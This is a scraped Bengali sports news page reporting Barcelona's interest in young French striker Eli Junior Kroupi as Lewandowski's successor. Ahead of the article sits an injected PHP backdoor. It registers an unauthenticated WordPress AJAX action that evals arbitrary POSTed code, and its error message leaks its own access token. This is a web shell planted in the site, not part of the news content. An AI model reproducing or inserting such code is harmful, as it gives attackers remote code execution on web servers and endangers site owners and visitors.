// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== লেভানদোভস্কির উত্তরসূরি হিসেবে বার্সার নজরে কে এই ক্রুপি? | potrikaybangladesh.com
Wednesday, September 23, 2026
Homeলেভানদোভস্কির উত্তরসূরি হিসেবে বার্সার নজরে কে এই ক্রুপি?

লেভানদোভস্কির উত্তরসূরি হিসেবে বার্সার নজরে কে এই ক্রুপি?

ইউরোপের ফুটবলে নতুন প্রজন্মের স্ট্রাইকারদের মধ্যে আলোচিত নামগুলোর একটি এখন এলি জুনিয়র ক্রুপি। মাত্র ২০ বছর বয়সেই ফরাসি এই ফরোয়ার্ডকে ঘিরে আগ্রহ দেখাতে শুরু করেছে ইউরোপের বেশ কয়েকটি শীর্ষ ক্লাব। সেই তালিকায় সর্বশেষ যোগ হয়েছে বার্সেলোনার নাম। রবার্ট লেভানদোভস্কির দীর্ঘমেয়াদি উত্তরসূরি খুঁজতে গিয়ে কাতালান ক্লাবটির নজর এখন এই তরুণ স্ট্রাইকারের দিকে।

ফ্রান্সের লরিয়ঁ একাডেমি থেকে উঠে আসা ক্রুপি ছোটবেলা থেকেই আক্রমণভাগে অসাধারণ প্রতিভার পরিচয় দিয়েছেন। ২০২৪-২৫ মৌসুমে লিগ টু-তে ২২ গোল করে আলোচনায় আসেন তিনি। সেই মৌসুমেই সর্বোচ্চ গোলদাতা ও সেরা খেলোয়াড়ের স্বীকৃতি পান। তার ধারাবাহিক পারফরম্যান্সের পুরস্কার হিসেবে ইংলিশ ক্লাব বোর্নমাউথ তাকে দলে ভেড়ায়।

ক্রুপির সবচেয়ে বড় শক্তি হলো তার গোল করার সহজাত ক্ষমতা। বক্সের ভেতরে নিখুঁত ফিনিশিং, দ্রুত গতি, প্রতিপক্ষের রক্ষণ ভাঙার দক্ষতা এবং একাধিক আক্রমণাত্মক পজিশনে খেলার সামর্থ্য তাকে সমসাময়িক তরুণ স্ট্রাইকারদের থেকে আলাদা করেছে। আধুনিক ফুটবলে একজন পূর্ণাঙ্গ স্ট্রাইকার হওয়ার জন্য প্রয়োজনীয় প্রায় সব গুণই তার মধ্যে রয়েছে বলে মনে করে বিশ্লেষকরা।

এ কারণেই বেশ কিছুদিন ধরে তাকে নিবিড়ভাবে পর্যবেক্ষণ করছে বার্সেলোনা। ক্লাবটির ক্রীড়া পরিচালক ডেকো নতুন মৌসুমের আগে আক্রমণভাগ শক্তিশালী করার পরিকল্পনা নিয়ে কাজ করছেন। বার্সেলোনার প্রথম লক্ষ্য এখনও অ্যাতলেতিকো মাদ্রিদের আর্জেন্টাইন তারকা হুলিয়ান আলভারেজ। তবে সেই চুক্তি জটিল হয়ে পড়লে বিকল্প হিসেবে ক্রুপির দিকে ঝুঁকতে পারে কাতালানরা।

স্প্যানিশ সংবাদমাধ্যমগুলোর দাবি, বার্সেলোনার ভেতরে ক্রুপিকে নিয়ে আলোচনা চলছে বেশ কিছুদিন ধরেই। কেউ কেউ মনে করেন, তিনি এখনও পুরোপুরি পরিণত হননি। তবে অন্য একটি পক্ষ বিশ্বাস করে, সঠিক পরিবেশ পেলে ভবিষ্যতের অন্যতম সেরা স্ট্রাইকার হয়ে উঠতে পারেন এই ফরাসি তরুণ।

বার্সেলোনার আগ্রহের আরেকটি গুরুত্বপূর্ণ কারণ তার বয়স। ৩৭ বছর বয়সী রবার্ট লেভানদোভস্কির পর দীর্ঘমেয়াদে আক্রমণভাগের নেতৃত্ব দিতে পারবেন এমন একজন খেলোয়াড় খুঁজছে ক্লাবটি। সেই বিবেচনায় ক্রুপিকে সম্ভাব্য উত্তরসূরি হিসেবে দেখা হচ্ছে।

প্রতিবেদন অনুযায়ী, প্রয়োজন হলে ক্রুপির জন্য প্রায় ১০০ মিলিয়ন ইউরো পর্যন্ত বিনিয়োগ করতেও প্রস্তুত বার্সেলোনা। যদিও বোর্নমাউথ সহজে তাদের সবচেয়ে মূল্যবান তরুণ তারকাকে ছাড়তে চাইবে না। তবুও বড় অঙ্কের প্রস্তাব এলে পরিস্থিতি বদলাতে পারে।

এদিকে স্প্যানিশ সাংবাদিক হেলেনা কন্দিসের দাবি, বার্সেলোনায় খেলা ক্রুপির অন্যতম বড় স্বপ্ন। ফলে কাতালান ক্লাব থেকে আনুষ্ঠানিক প্রস্তাব এলে খেলোয়াড়ের পক্ষ থেকে ইতিবাচক সাড়া পাওয়ার সম্ভাবনাও রয়েছে।

হুলিয়ান আলভারেজকে ঘিরে বার্সেলোনার পরিকল্পনা আগামী কয়েক দিনের মধ্যে পরিষ্কার হয়ে যেতে পারে। তবে একটি বিষয় ইতোমধ্যেই স্পষ্ট, ইউরোপীয় ফুটবলের নতুন উদীয়মান তারকাদের তালিকায় এলি জুনিয়র ক্রুপি নিজের জায়গা করে নিয়েছেন। আর সেই কারণেই লেভানদোভস্কির উত্তরসূরি খোঁজার পথে বার্সেলোনার নজর এখন এই ফরাসি গোলমেশিনের দিকে।

 

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments